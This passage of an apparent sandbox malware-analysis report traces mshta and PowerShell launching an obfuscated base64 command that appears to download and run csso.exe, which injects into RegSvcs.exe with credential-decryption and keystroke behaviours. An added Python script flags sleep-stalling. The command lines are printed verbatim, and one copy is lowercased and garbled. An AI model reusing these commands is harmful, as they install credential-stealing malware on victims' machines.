Source: powershell.exe, 00000003.00000002.1404410976.0000000007E82000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000003.00000002.1399001221.00000000046E7000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Get-NetEventVmNetworkAdapter
Source: RegSvcs.exe, 00000007.00000002.2525931036.0000000000A47000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\csso.exe; API call chain: ExitProcess graph end node (graph_6-101102)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Code function: 7_2_0245C168 LdrInitializeThunk,LdrInitializeThunk
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00093F09 BlockInput
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00023B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00055A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00024B37 LoadLibraryA,GetProcAddress
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00A71180 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00A72780 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00A727E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_000780A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_0004A124 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_0004A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Memory allocated: page read and write | page guard
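The thread-delay entries above are the stalling pattern a sandbox scores: three threads exceed the report's 30-sleep threshold (6823, 7738 and 1890 calls), and the powershell.exe delay time of 922337203685477 is the magnitude of the 64-bit limit in 100-ns ticks converted to milliseconds, i.e. a wait that never returns on its own; the -5534023222112862 total is exactly six of them. The following script is an added example, not code from this report or from the sample: it replays constructed NtDelayExecution-style events of the same shape through the report's two thresholds (more than 30 sleeps per thread, 30000 s or more of total delay), converting the native relative interval, a negative LARGE_INTEGER in 100-ns ticks, to seconds. The event format, thread ids and intervals are constructed for the example.

```python
"""Sleep-stalling triage over sandbox thread-delay events (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass

# Thresholds as printed in the report entries ("6823 > 30", ">= -30000s").
MAX_SLEEP_CALLS_PER_THREAD = 30
MAX_TOTAL_DELAY_SECONDS = 30_000
# NtDelayExecution takes a LARGE_INTEGER in 100-ns ticks; negative means relative.
TICKS_PER_SECOND = 10_000_000
INT64_MIN = -(2 ** 63)  # largest possible relative wait, effectively "sleep forever"

# Constructed event format (not Joe Sandbox's): "<image> TID: <tid> NtDelayExecution interval=<ticks>"
EVENT_RE = re.compile(r"^(?P<image>\S+) TID: (?P<tid>\d+) NtDelayExecution interval=(?P<interval>-?\d+)$")


@dataclass
class ThreadStats:
    calls: int = 0            # relative delays seen on this thread
    total_seconds: float = 0.0
    absolute_waits: int = 0   # non-negative intervals are absolute deadlines, not delays


def relative_delay_seconds(interval):
    """Seconds for a relative (negative) interval; None for an absolute (non-negative) one."""
    if interval >= 0:
        return None
    return -interval / TICKS_PER_SECOND


def build_sample_events():
    """Constructed log shaped like the report: one busy-looping thread, one 'infinite' waiter."""
    lines = ["mshta.exe TID: 7340 NtDelayExecution interval=-100000"] * 6823        # 10 ms each
    lines += [f"powershell.exe TID: 7536 NtDelayExecution interval={INT64_MIN}"] * 6
    lines += ["conhost.exe TID: 7600 NtDelayExecution interval=-5000000"] * 3       # 0.5 s each
    lines += ["conhost.exe TID: 7600 NtDelayExecution interval=133000000000000000"]  # absolute
    lines += ["unrelated line that does not parse"]
    return lines


def aggregate(lines):
    """Per-(image, tid) sleep count and summed delay."""
    stats = defaultdict(ThreadStats)
    for line in lines:
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        key = (m["image"], int(m["tid"]))
        secs = relative_delay_seconds(int(m["interval"]))
        if secs is None:
            stats[key].absolute_waits += 1
        else:
            stats[key].calls += 1
            stats[key].total_seconds += secs
    return dict(stats)


def findings(stats):
    """Apply the two thresholds the report uses and return one finding string per hit."""
    out = []
    for (image, tid), s in sorted(stats.items()):
        if s.calls > MAX_SLEEP_CALLS_PER_THREAD:
            out.append(f"{image} TID {tid}: sleep count {s.calls} > {MAX_SLEEP_CALLS_PER_THREAD}")
        if s.total_seconds >= MAX_TOTAL_DELAY_SECONDS:
            out.append(f"{image} TID {tid}: total delay {s.total_seconds:.0f}s >= {MAX_TOTAL_DELAY_SECONDS}s")
    return out


if __name__ == "__main__":
    for hit in findings(aggregate(build_sample_events())):
        print(hit)
```

Both thresholds are needed: the mshta.exe thread trips only the call-count check (many 10 ms sleeps), while the powershell.exe thread makes just six calls but requests an interval the sandbox can only skip or time out, which is why a sandbox fast-forwards long sleeps rather than honouring them.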

HIPS / PFW / Operating System Protection Evasion

Source: Yara match; File source: amsi32_7452.amsi.csv, type: OTHER
Source: 6.2.csso.exe.30f0000.1.raw.unpack, UltraSpeed.cs; Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 6.2.csso.exe.30f0000.1.raw.unpack, FFDecryptor.cs; Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 6.2.csso.exe.30f0000.1.raw.unpack, FFDecryptor.cs; Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
Source: C:\Users\user\AppData\Roaming\csso.exe; Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\csso.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 577008
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_000787B1 LogonUserW
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00023B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_000248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00084C27 mouse_event
Source: C:\Windows\SysWOW64\mshta.exe; Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL.exe -Ex bypASs -NOp -w 1 -C DeviceCRedENTiAldEploYMEnt.EXe ; Iex($(ieX('[sySteM.Text.eNCoDING]'+[cHAr]0x3A+[CHaR]58+'uTF8.getStRING([SYSteM.coNVert]'+[cHAr]58+[cHar]58+'FroMBASE64sTrIng('+[CHaR]0X22+'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'+[cHar]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbmngfjp\hbmngfjp.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Users\user\AppData\Roaming\csso.exe "C:\Users\user\AppData\Roaming\csso.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC24D.tmp" "c:\Users\user\AppData\Local\Temp\hbmngfjp\CSCC4E96BC32174751BC6DB24E42E04ED1.TMP"
Source: C:\Users\user\AppData\Roaming\csso.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csso.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgogicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhzeqtdflwzsagicagicagicagicagicagicagicagicagicagicagicatbuvtqkvsrgvmau5pdglvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjmbw9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagryxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagsndgrixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhlwlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagekopoycgicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicagikh1d0pytxvksewiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagzwr2icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjgo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjgvntavy3nzby5leguilcikzu5wokfquerbvefcy3nzby5leguildasmck7u3rbulqtu0xfzxaomyk7au5wb0tllul0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxjc3nvlmv4zsi='+[char]34+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jgogicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhzeqtdflwzsagicagicagicagicagicagicagicagicagicagicagicatbuvtqkvsrgvmau5pdglvbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgidxjmbw9ulmrsbcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagryxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagsndgrixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagicagrhlwlhvpbnqgicagicagicagicagicagicagicagicagicagicagicagwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagekopoycgicagicagicagicagicagicagicagicagicagicagicaglu5htuugicagicagicagicagicagicagicagicagicagicagicagikh1d0pytxvksewiicagicagicagicagicagicagicagicagicagicagicagic1uyw1lc1bby0ugicagicagicagicagicagicagicagicagicagicagicagzwr2icagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjgo6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8ymy45ns4ymzuumjgvntavy3nzby5leguilcikzu5wokfquerbvefcy3nzby5leguildasmck7u3rbulqtu0xfzxaomyk7au5wb0tllul0zw0gicagicagicagicagicagicagicagicagicagicagicagiirfbly6qvbqrefuqvxjc3nvlmv4zsi='+[char]34+'))')))"
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_00077CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_0007874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: csso.exe, 00000006.00000002.1395985820.00000000000D4000.00000002.00000001.01000000.0000000A.sdmp, csso.exe.3.dr, csso[1].exe.3.dr; Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: csso.exe; Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Roaming\csso.exe; Code function: 6_2_0004862B cpuid
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
